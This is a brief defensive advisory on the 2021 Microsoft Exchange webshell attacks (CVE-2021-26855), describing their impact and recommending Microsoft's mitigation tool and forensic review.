This category includes all kinds of intrusions, virtual or physical.

Exchange Webshell (CVE-2021-26855)


On March 2, 2021, Microsoft released emergency patches for their email server software Microsoft Exchange which fixed vulnerabilities that were already actively exploited in the wild.[0] Attackers quickly started installing webshells on any vulnerable installations connected to the public Internet. That way they created a persistent backdoor for themselves, enabling them to come back later and take additional steps.


  • Attackers have access to your Exchange server, can run arbitrary code on it, read emails and change the underlying OS at whim.
  • If your internal network or parts thereof can be reached via your Exchange server attackers can further advanced into your network and take additional steps like installing ransomware or stealing data.


  • Use Microsoft's Exchange On-premises Mitigation Tool (EOMT) which protects your server against future attacks and removes any webshells Microsoft can detect.
  • As Microsoft can obviously only remove webshells it knows about it is strongly recommended to manually check your Exchange server for other signs of an intrusion by means of a forensic analysis. If you have any indication that the attackers also accessed your internal network, implement network monitoring to confirm/dismiss this and act accordingly.